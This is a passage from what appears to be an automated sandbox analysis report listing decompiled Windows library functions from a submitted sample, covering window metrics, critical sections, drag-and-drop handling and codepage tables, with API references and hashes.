0x00424fbb
0x00424fc7
0x00424fcf
0x00424fe1
0x00424fef
0x00424ffd
0x00425002
0x00000000
0x00425002
0x00424fcf
0x00425008

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(0000E800), ref: 00424FC0
IsZoomed.USER32(00000000), ref: 00424FC7
GetSystemMetrics.USER32 ref: 00424FEF
GetSystemMetrics.USER32 ref: 00424FFD

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3C9, Relevance: 6.0, APIs: 4, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040E3C9(void* __ecx) {
				long _t1;
				long _t3;
				long _t8;
				void* _t9;

				_t1 =  *0x43a478; // 0x2
				_t9 = __ecx;
				_t8 = 2;
				if(_t1 != _t8) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x43a478 - 1;
							if( *0x43a478 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x43a478 - _t8; // 0x2
						if(__eflags != 0) {
							L12:
							return _t9;
						}
						L10:
						_push(0x43a460);
						L11:
						EnterCriticalSection();
						goto L12;
					}
					_t3 = InterlockedExchange(0x43a478, 1);
					__eflags = _t3;
					if(__eflags != 0) {
						__eflags = _t3 - _t8;
						if(_t3 == _t8) {
							 *0x43a478 = _t8;
						}
						goto L7;
					}
					InitializeCriticalSection(0x43a460);
					E00405626(__eflags, E0040E447);
					 *0x43a478 = _t8;
					goto L10;
				}
				_push(0x43a460);
				goto L11;
			}

0x0040e3c9
0x0040e3d3
0x0040e3d5
0x0040e3d8
0x0040e3e1
0x0040e3e8
0x0040e41f
0x0040e41f
0x0040e41f
0x0040e426
0x00000000
0x00000000
0x0040e42a
0x0040e42a
0x0040e432
0x0040e438
0x0040e441
0x0040e446
0x0040e446
0x0040e43a
0x0040e43a
0x0040e43b
0x0040e43b
0x00000000
0x0040e43b
0x0040e3f1
0x0040e3f7
0x0040e3f9
0x0040e415
0x0040e417
0x0040e419
0x0040e419
0x00000000
0x0040e417
0x0040e3fc
0x0040e407
0x0040e40d
0x00000000
0x0040e40d
0x0040e3da
0x00000000

APIs

InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E

Uniqueness

Uniqueness Score: -1.00%

Function 0042146D, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042146D(void* __ecx, void* _a4) {
				int _v8;
				char _v268;
				void* __ebp;
				void* _t15;
				int _t19;
				intOrPtr* _t23;
				void* _t25;

				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
				_t19 = 0;
				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t15 = E00424BFB();
				_t23 =  *((intOrPtr*)(_t15 + 4));
				if(_v8 > 0) {
					do {
						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
						_t19 = _t19 + 1;
					} while (_t19 < _v8);
				}
				DragFinish(_a4);
				return _t15;
			}

0x00421483
0x0042148e
0x00421499
0x0042149c
0x004214a4
0x004214a7
0x004214a9
0x004214b9
0x004214c6
0x004214c9
0x004214ca
0x004214a9
0x004214d2
0x004214dc

APIs

SetActiveWindow.USER32(?), ref: 0042147C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
DragFinish.SHELL32(?), ref: 004214D2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004159DA, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

0x004159e4
0x00415a49
0x00000000
0x004159ec
0x004159ec
0x004159f2
0x00000000
0x00415a0f
0x00415a18
0x00415a24
0x00415a2a
0x00415a30
0x00415a34
0x00415a34
0x00415a3e
0x00415a46
0x00000000
0x00415a46
0x004159f2

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
SetBkColor.GDI32(00000000,00000000), ref: 00415A24
GetSysColor.USER32(00000008), ref: 00415A34
SetTextColor.GDI32(00000000,?), ref: 00415A3E

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99

Uniqueness

Uniqueness Score: -1.00%

Function 00423A6F, Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00423A6F(void* __ecx) {
				void* __esi;
				void* _t16;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				E00406520(E0042A9EC, _t30);
				_push(__ecx);
				_push(__ecx);
				_t34 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_t28 = __ecx;
				if(_t34 == 0) {
					 *((intOrPtr*)(_t30 - 4)) = 0;
					if( *(_t30 + 0xc) != 0) {
						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
					} else {
						E00416A77(__ecx + 0xc8, __ecx);
					}
					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
					_t16 = 1;
				} else {
					_t16 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

0x00423a74
0x00423a79
0x00423a7a
0x00423a80
0x00423a86
0x00423a89
0x00423a8b
0x00423a97
0x00423a9a
0x00423ac2
0x00423a9c
0x00423aa2
0x00423aa2
0x00423ad2
0x00423ada
0x00423a8d
0x00423a8d
0x00423a8d
0x00423aea
0x00423af3

APIs

__EH_prolog.LIBCMT ref: 00423A74
SendMessageA.USER32 ref: 00423AD2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004297EF, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004297EF(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E004298F1(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}

0x004297f8
0x004297fd
0x0042980a
0x00429816
0x00429821
0x00429824
0x00429832
0x0042983f
0x00000000
0x00429850
0x00429858

APIs

GetViewportOrgEx.GDI32(?,?), ref: 0042980A

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
GetWindowOrgEx.GDI32(?,?), ref: 0042983F
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00423946, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
				int _t13;
				int _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t24;

				asm("pushfd");
				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_t20 = E00416528(_t18);
					if((_t20 & 0x00040600) == 0) {
						_push(GetSystemMetrics(6));
						_push(5);
					} else {
						_push(GetSystemMetrics(0x21));
						_push(0x20);
					}
					_t13 = GetSystemMetrics();
					_t24 = _a5;
					_t14 = InflateRect(_t24, _t13, ??);
					if((_t20 & 0x00c00000) != 0) {
						_t14 =  *0x439c9c; // 0x0
						_t24->top = _t24->top - _t14;
					}
				} else {
					_t14 = E00415361(_t18, _a5, _a9);
				}
				return _t14;
			}

0x00423947
0x00423949
0x0042394c
0x00423963
0x0042396b
0x00423986
0x00423987
0x0042396d
0x00423977
0x00423978
0x00423978
0x00423989
0x0042398b
0x00423991
0x0042399e
0x004239a0
0x004239a5
0x004239a5
0x0042394e
0x00423956
0x00423956
0x004239a9

APIs

GetSystemMetrics.USER32 ref: 00423975
GetSystemMetrics.USER32 ref: 00423989
InflateRect.USER32(?,00000000), ref: 00423991

Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00422D9C, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00422D9C(struct tagRECT* _a8) {
				signed int _t11;
				int _t13;
				intOrPtr _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t23;

				if( *0x439c44 != 0) {
					return E004136A7(_t18);
				}
				_t20 = E00416528(_t18);
				if((_t20 & 0x00040600) == 0) {
					_push( ~(GetSystemMetrics(6)));
					_push(5);
				} else {
					_push( ~(GetSystemMetrics(0x21)));
					_push(0x20);
				}
				_t11 = GetSystemMetrics();
				_t23 = _a8;
				_t13 = InflateRect(_t23,  ~_t11, ??);
				if((_t20 & 0x00c00000) != 0) {
					_t14 =  *0x439c9c; // 0x0
					_t23->top = _t23->top + _t14;
					return _t14;
				}
				return _t13;
			}

0x00422da4
0x00000000
0x00422da6
0x00422db3
0x00422dbb
0x00422dda
0x00422ddb
0x00422dbd
0x00422dc9
0x00422dca
0x00422dca
0x00422ddd
0x00422ddf
0x00422de7
0x00422df4
0x00422df6
0x00422dfb
0x00000000
0x00422dfb
0x00422dff

APIs

GetSystemMetrics.USER32 ref: 00422DC5
GetSystemMetrics.USER32 ref: 00422DDD
InflateRect.USER32(?,00000000), ref: 00422DE7

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A843, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A843(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				int _t14;
				int _t15;

				_t15 = lstrlenA(_a8);
				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 = lstrcmpA( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}

0x0041a856
0x0041a85f
0x0041a88a
0x00000000
0x0041a890
0x0041a880
0x0041a888
0x00000000
0x00000000
0x0041a898

APIs

lstrlenA.KERNEL32(?,00000800), ref: 0041A850
GetWindowTextA.USER32 ref: 0041A86C
lstrcmpA.KERNEL32(?,?), ref: 0041A880
SetWindowTextA.USER32(00000104,?), ref: 0041A890

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420031, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420031(void* __ecx, void* __eflags) {
				signed int _t9;
				int _t10;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t13 = __ecx;
				E0042007A(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E00413740(_t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t9 =  *(_t13 + 0x84);
				_t14 = _t13 + 0x84;
				if(_t9 != 0) {
					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t10;
				}
				return _t9;
			}

0x00420033
0x00420037
0x0042003c
0x00420050
0x00420052
0x00420058
0x0042005e
0x00420066
0x0042006e
0x00420074
0x00000000
0x00420074
0x00420079

APIs

Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

ReleaseCapture.USER32(00000001,74ECA0A0,?,00420430,00000000), ref: 0042003C
GetDesktopWindow.USER32 ref: 00420042
LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
ReleaseDC.USER32 ref: 0042006E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406D64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406D64(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x43b660) = _t77;
								goto L16;
							}
							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
						} else {
							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x43b660) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00406d81
0x00406d87
0x00406d8e
0x00406d8e
0x00406d95
0x00406d96
0x00406d9a
0x00406d9d
0x00406da6
0x00406ddf
0x00406dfe
0x00406e22
0x00406e4a
0x00406e52
0x00406e54
0x00406e5a
0x00406e5a
0x00406e60
0x00406e7b
0x00406e8d
0x00000000
0x00406e8d
0x00406e7d
0x00406e84
0x00406e70
0x00406e70
0x00000000
0x00406e70
0x00406e62
0x00406e69
0x00000000
0x00406e94
0x00406e94
0x00406e96
0x00406e97
0x00000000
0x00406e5a
0x00406daa
0x00406dad
0x00406dad
0x00406db0
0x00406db5
0x00406db9
0x00406dc0
0x00406dc8
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd5
0x00406dd6
0x00406dd9
0x00000000
0x00406dde
0x00406e9d
0x00406ea4
0x00406ea7
0x00406ec5
0x00406eda
0x00406ecc
0x00406ecc
0x00406ed5
0x00000000
0x00406ed5
0x00406eae
0x00406eae
0x00406eb7
0x00406eba
0x00406eba
0x00406eba
0x00406ee1
0x00406ee2
0x00406ee8

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00406D78

Strings

, xrefs: 00406D9D
, xrefs: 00406DC1

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
